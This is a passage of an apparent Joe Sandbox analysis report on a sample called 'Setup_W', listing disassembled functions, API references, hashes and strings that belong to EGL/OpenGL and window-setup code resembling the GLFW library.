                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                • String ID:
                                                                                                • API String ID: 520269711-0
                                                                                                • Opcode ID: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
                                                                                                • Instruction ID: 4368150bcebd0d5d296739eab8096d8ee2dcb78995e09cae170670a87d726f28
                                                                                                • Opcode Fuzzy Hash: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
                                                                                                • Instruction Fuzzy Hash: 841105B5908384CFEB11EF7EC549659BBF0FB4A305F449429E84497300E774A944CF92
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32 ref: 646082DF
                                                                                                • FormatMessageW.KERNEL32 ref: 64608317
                                                                                                • WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                  • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorFormatLastMessageMultiWidecallocstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 4215368167-0
                                                                                                • Opcode ID: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
                                                                                                • Instruction ID: adaf8a1903572cba01a8a3079a11a46211bc0e26c5758607537fd6aa15b1cc0a
                                                                                                • Opcode Fuzzy Hash: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
                                                                                                • Instruction Fuzzy Hash: AA21D6B1408345DFE750EF69C54879ABBF1FB84314F00896DE5989B290C7B89A89CF82
                                                                                                APIs
                                                                                                • RegisterRawInputDevices.USER32 ref: 6460BAA3
                                                                                                  • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                                                  • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                                                  • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharDevicesErrorFormatInputLastMessageMultiRegisterWide
                                                                                                • String ID: @:ad
                                                                                                • API String ID: 2565755986-2778011840
                                                                                                • Opcode ID: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
                                                                                                • Instruction ID: 08e6777a9edac521f99355513d5423c6298ba1827fe259af2578882fcd771688
                                                                                                • Opcode Fuzzy Hash: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
                                                                                                • Instruction Fuzzy Hash: 58E065714082449BDB01EFA9D6047DEBBF8EF81715F408828D98557200DB759A48CB92
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Iconic
                                                                                                • String ID:
                                                                                                • API String ID: 110040809-0
                                                                                                • Opcode ID: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
                                                                                                • Instruction ID: 50faefa21715e4e1c21aa030e48e9c97a0ede8ffee063f6bd876839af5adcc39
                                                                                                • Opcode Fuzzy Hash: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
                                                                                                • Instruction Fuzzy Hash: FEC08C382042049FCB00BF6CC54D8083BF8AF45202F4044A8A8818B302DA70E8008B92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
                                                                                                • Instruction ID: ca04ee5e1998c071bdabcf0428fcc9233e076c172b21be8776349022a1105c3d
                                                                                                • Opcode Fuzzy Hash: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
                                                                                                • Instruction Fuzzy Hash: 9CD09E742013098BFB098F5ACA61B667BA9BF55B11F14C058DC244F741D775E581CB50

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 335 646021f7-64602223 336 64602599-6460259f 335->336 337 64602229-6460222d 335->337 338 64602245-6460224d 337->338 339 6460222f-64602243 LoadLibraryA 337->339 340 64602268-64602425 strncmp GetProcAddress * 16 338->340 341 6460224f-64602263 call 64602ef4 338->341 339->337 339->338 343 6460242b-64602432 340->343 344 646024ae-646024bd call 64602ef4 340->344 348 646024c7-646024c9 341->348 343->344 347 64602434-6460243c 343->347 349 646024c2 call 646021b5 344->349 347->344 350 6460243e-64602445 347->350 348->336 349->348 350->344 352 64602447-6460244e 350->352 352->344 353 64602450-64602457 352->353 353->344 354 64602459-64602460 353->354 354->344 355 64602462-64602469 354->355 355->344 356 6460246b-64602472 355->356 356->344 357 64602474-6460247b 356->357 357->344 358 6460247d-64602484 357->358 358->344 359 64602486-6460248d 358->359 359->344 360 6460248f-64602496 359->360 360->344 361 64602498-6460249f 360->361 361->344 362 646024a1-646024a8 361->362 362->344 363 646024aa-646024ac 362->363 363->344 364 646024ce-646024df 363->364 366 646024e1-646024f8 call 64601f54 364->366 367 646024fa-64602518 364->367 375 64602531-6460253d call 64602ef4 366->375 370 6460251a-6460252d call 64601f54 367->370 371 6460253f-64602594 call 64601fb6 * 5 367->371 370->375 371->336 375->349
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32 ref: 64602235
                                                                                                • strncmp.MSVCRT ref: 6460227B
                                                                                                • GetProcAddress.KERNEL32 ref: 6460229E
                                                                                                • GetProcAddress.KERNEL32 ref: 646022B7
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 646022D0
                                                                                                • GetProcAddress.KERNEL32 ref: 646022E9
                                                                                                • GetProcAddress.KERNEL32 ref: 64602302
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 6460231B
                                                                                                • GetProcAddress.KERNEL32 ref: 64602334
                                                                                                • GetProcAddress.KERNEL32 ref: 6460234D
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 64602366
                                                                                                • GetProcAddress.KERNEL32 ref: 6460237F
                                                                                                • GetProcAddress.KERNEL32 ref: 64602398
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 646023B1
                                                                                                • GetProcAddress.KERNEL32 ref: 646023CA
                                                                                                • GetProcAddress.KERNEL32 ref: 646023E3
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 646023FC
                                                                                                • GetProcAddress.KERNEL32 ref: 64602415
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoadstrncmp
                                                                                                • String ID: $Had$EGL.dll$EGL: Failed to get EGL display: %s$EGL: Failed to load required entry points$EGL: Library not found$EGL_KHR_context_flush_control$EGL_KHR_create_context$EGL_KHR_create_context_no_error$EGL_KHR_get_all_proc_addresses$EGL_KHR_gl_colorspace$eglGetConfigAttrib$eglGetDisplay$eglGetProcAddress$eglInitialize$eglMakeCurrent$eglQueryString$eglSwapBuffers$eglSwapInterval$lib$libEGL.dll
                                                                                                • API String ID: 1199942516-1957977352
                                                                                                • Opcode ID: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
                                                                                                • Instruction ID: 2be6e0a8a46068feab80a72f97e01e57a28abbd52c323695223df50d50299026
                                                                                                • Opcode Fuzzy Hash: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
                                                                                                • Instruction Fuzzy Hash: 8FA12BB450E380DFDB26DF6AC6857AAFBE4FF56708F01992DE49487640D3B58880CB52

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 390 64601b16-64601b8a call 6460ad78 glfwMakeContextCurrent 395 64601d00 390->395 396 64601b90-64601b92 390->396 398 64601d08 395->398 396->395 397 64601b98-64601ba9 396->397 403 64601bd0-64601bd4 397->403 404 64601bab-64601bb4 397->404 399 64601d0f call 64602ef4 398->399 400 64601d14-64601d1e glfwMakeContextCurrent 399->400 402 64601ec6-64601ecf 400->402 407 64601c11-64601c43 sscanf 403->407 408 64601bd6-64601c02 strlen strncmp 403->408 405 64601bc3-64601bcb 404->405 406 64601bb6-64601bbe 404->406 405->398 406->398 410 64601c45-64601c4f 407->410 411 64601c7c-64601c8a 407->411 408->403 409 64601c04-64601c0e 408->409 409->407 414 64601c51-64601c59 410->414 415 64601c5b 410->415 412 64601c9c-64601cc2 411->412 413 64601c8c 411->413 418 64601cc4-64601ccc 412->418 419 64601cce 412->419 416 64601ce4-64601ce7 413->416 417 64601c8e-64601c9a 413->417 420 64601c63 414->420 415->420 422 64601d23-64601d2d 416->422 423 64601ce9-64601cfe 416->423 417->412 417->416 421 64601cd6 418->421 419->421 424 64601c6a call 64602ef4 420->424 427 64601cdd call 64602ef4 421->427 425 64601e02 422->425 426 64601d33-64601d3a 422->426 423->395 423->422 428 64601c6f-64601c77 glfwMakeContextCurrent 424->428 432 64601e09-64601e10 glfwExtensionSupported 425->432 429 64601d9c-64601da3 426->429 430 64601d3c-64601d57 426->430 431 64601ce2 427->431 428->402 436 64601db0-64601dcb 429->436 437 64601da5 429->437 444 64601d63-64601d65 430->444 445 64601d59 430->445 431->400 434 64601e12-64601e30 432->434 435 64601e4f-64601e5d glfwExtensionSupported 432->435 453 64601e32-64601e3c 434->453 454 64601e3e-64601e43 434->454 438 64601e99-64601ec1 glfwMakeContextCurrent 435->438 439 64601e5f-64601e7a 435->439 448 64601dd9-64601ddb 436->448 449 64601dcd-64601dd7 436->449 441 64601da7-64601dae 437->441 442 64601df9-64601e00 437->442 438->402 455 64601e88-64601e8d 439->455 456 64601e7c-64601e86 439->456 441->436 441->442 442->432 450 64601d73-64601d81 glfwExtensionSupported 444->450 451 64601d67-64601d71 444->451 445->444 457 64601de9-64601df7 glfwExtensionSupported 448->457 458 64601ddd-64601de7 448->458 449->442 459 64601d8c-64601d90 450->459 460 64601d83-64601d8a 450->460 451->459 453->435 454->435 461 64601e45 454->461 455->438 462 64601e8f 455->462 456->438 457->442 457->449 458->442 459->429 464 64601d92 459->464 460->451 460->459 461->435 462->438 464->429
                                                                                                APIs
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • glfwMakeContextCurrent.GLFW.4281411633 ref: 64601B58
                                                                                                • strlen.MSVCRT ref: 64601BDF
                                                                                                • strncmp.MSVCRT ref: 64601BF5
                                                                                                • sscanf.MSVCRT ref: 64601C3A
                                                                                                • glfwMakeContextCurrent.GLFW.4281411633 ref: 64601C72
                                                                                                • glfwMakeContextCurrent.GLFW.4281411633 ref: 64601D19
                                                                                                • glfwExtensionSupported.GLFW.4281411633(00000000,00000000), ref: 64601D7A
                                                                                                • glfwExtensionSupported.GLFW.4281411633(00000000,00000000), ref: 64601DF0
                                                                                                • glfwExtensionSupported.GLFW.4281411633 ref: 64601E09
                                                                                                • glfwExtensionSupported.GLFW.4281411633 ref: 64601E56
                                                                                                • glfwMakeContextCurrent.GLFW.4281411633 ref: 64601EC1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: glfw$ContextCurrent.ExtensionMakeSupported.$Valuesscanfstrlenstrncmp
                                                                                                • String ID: %d.%d.%d$Entry point retrieval is broken$GL_ARB_compatibility$GL_ARB_debug_output$GL_ARB_robustness$GL_EXT_robustness$GL_KHR_context_flush_control$OpenGL ES version string retrieval is broken$OpenGL version string retrieval is broken$Requested OpenGL ES version %i.%i, got version %i.%i$`Dad$glClear$glGetIntegerv$glGetString$glGetStringi
                                                                                                • API String ID: 1542904474-82678582
                                                                                                • Opcode ID: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
                                                                                                • Instruction ID: ec955498274e6c36eaf435dfca11977ababeb186932dd94b9ddddddf6aa5bf5a
                                                                                                • Opcode Fuzzy Hash: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
                                                                                                • Instruction Fuzzy Hash: D5A115B09082059BDB099F69C2847DEBBF4FF54B0CF04C82EDC989B245D7B68581CB62

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 686 646025a0-646025b3 687 646025b5-646025c4 686->687 688 646025c9-646025d1 686->688 689 6460281b-64602820 call 64602ef4 687->689 690 646025d3 688->690 691 646025d9-64602607 688->691 697 64602b55-64602b57 689->697 690->691 695 64602622-6460267b calloc * 2 691->695 696 64602609-6460261d call 64602ef4 691->696 703 64602685-64602691 695->703 702 6460280c-64602814 696->702 699 64602c7f-64602c88 697->699 702->689 704 64602697-646026b7 call 64601f6c 703->704 705 646027be-646027e1 call 64601627 703->705 710 646027b3-646027b9 704->710 711 646026bd-646026cb call 64601f6c 704->711 712 646027e3-646027e6 705->712 713 646027ec-6460280a free * 2 705->713 710->703 711->710 719 646026d1-646026db 711->719 712->713 713->702 715 64602825-64602833 713->715 716 64602835-64602841 715->716 717 6460285c-64602868 715->717 726 64602843-6460285a call 64601f54 716->726 727 6460288d-64602899 716->727 717->727 728 6460286a-6460287d call 64601f54 717->728 722 646026e1-646026ef 719->722 723 64602795-6460279a 719->723 729 646026f5-646026fa call 64601f6c 722->729 730 64602789-64602790 call 64601f6c 722->730 724 646027a0-646027ae call 64601f6c 723->724 725 64602702-64602787 call 64601f6c * 7 723->725 748 646026fc 724->748 725->710 764 64602881-64602888 726->764 734 646029cf-646029d5 727->734 735 6460289f-646028a5 727->735 728->764 729->748 730->748 739 646029f2-646029f9 734->739 740 646029d7-646029ed 734->740 743 646028d3-646028d5 735->743 744 646028a7-646028ac 735->744 749 64602a48-64602a92 739->749 750 646029fb-64602a0a 739->750 740->739 755 646028d7-646028de 743->755 752 646028b3-646028c3 744->752 753 646028ae 744->753 748->710 748->725 776 64602a94-64602ab2 call 64601f54 749->776 777 64602ab7-64602abf 749->777 757 64602a27-64602a2d 750->757 758 64602a0c-64602a25 750->758 752->755 760 646028c5-646028d1 752->760 753->752 762 646028e0 755->762 763 646028e3-646028eb 755->763 757->749 765 64602a2f-64602a3d 757->765 758->749 760->755 762->763 768 64602931-64602938 763->768 769 646028ed-646028f2 763->769 772 64602b50 call 64602ef4 764->772 765->749 773 6460293a-64602941 768->773 774 6460295c-6460296b 768->774 770 646028f4-64602908 769->770 771 6460290a-6460290f 769->771 780 64602925-6460292a 770->780 781 64602911-6460291b 771->781 782 6460292c 771->782 772->697 773->774 783 64602943-64602959 773->783 784 64602971-64602994 774->784 785 6460296d-6460296f 774->785 776->772 778 64602ac1-64602ac8 777->778 779 64602ae3-64602b30 777->779 778->779 788 64602aca-64602ad9 778->788 798 64602b32-64602b49 call 64601f54 779->798 799 64602b5c-64602b73 779->799 789 6460292e 780->789 781->780 782->789 783->774 790 6460299b-6460299d 784->790 785->784 785->790 788->779 789->768 795 646029b4-646029b6 790->795 796 6460299f-646029b1 790->796 795->739 802 646029b8-646029cd 795->802 796->795 798->772 803 64602b79-64602bb6 799->803 804 64602c3b-64602c75 799->804 802->739 807 64602bf8-64602bfc 803->807 808 64602bb8-64602bcb 803->808 804->699 811 64602bcd-64602bf3 strncmp 807->811 812 64602bfe-64602c23 807->812 808->807 815 64602c00-64602c15 LoadLibraryA 811->815 816 64602bf5 811->816 812->804 820 64602c25-64602c39 call 64602ef4 812->820 815->816 819 64602c17 815->819 816->807 819->804 820->699
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoadstrncmp
                                                                                                • String ID: 0ad$80$80$EGL: API not available$EGL: Failed to create window surface: %s$EGL: Failed to find a suitable EGLConfig$EGL: Failed to load client library$lib$mIad
                                                                                                • API String ID: 2374402810-160528034
                                                                                                • Opcode ID: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
                                                                                                • Instruction ID: 12e493b34a711624c8fe5681839838a58ab6d86c7415c144379c5bb511d2725b
                                                                                                • Opcode Fuzzy Hash: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
                                                                                                • Instruction Fuzzy Hash: 860236B4A093048FDB59DF18D68479ABBF5EF44708F10C8AAE8899B240D775DD89CF42

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDevice$ByteCharDisplayEnumMultiWidewcscpy$CreateDeleteMonitorsSettingsfree
                                                                                                • String ID: $Z
                                                                                                • API String ID: 2479431636-3176842942
                                                                                                • Opcode ID: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
                                                                                                • Instruction ID: 8ed80cccbdc88c8452718737337ac4828fed65368ce2b2488aeba01ce2f50826
                                                                                                • Opcode Fuzzy Hash: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
                                                                                                • Instruction Fuzzy Hash: B691F6B0909319DFDB24DF29C9447DABBF0FF98710F0189ADE498A7240D7749A848F82

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32 ref: 6460739E
                                                                                                • GetProcAddress.KERNEL32 ref: 646073CC
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 646073E5
                                                                                                • GetProcAddress.KERNEL32(00000001,00000001), ref: 646073FE
                                                                                                • GetProcAddress.KERNEL32 ref: 64607417
                                                                                                • GetProcAddress.KERNEL32 ref: 64607430
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 64607449
                                                                                                • GetProcAddress.KERNEL32(00000001,00000001), ref: 64607462
                                                                                                • GetDC.USER32 ref: 64607476
                                                                                                • ChoosePixelFormat.GDI32 ref: 646074A6
                                                                                                • SetPixelFormat.GDI32(?,?), ref: 646074B9
                                                                                                  • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                                                  • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                                                  • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
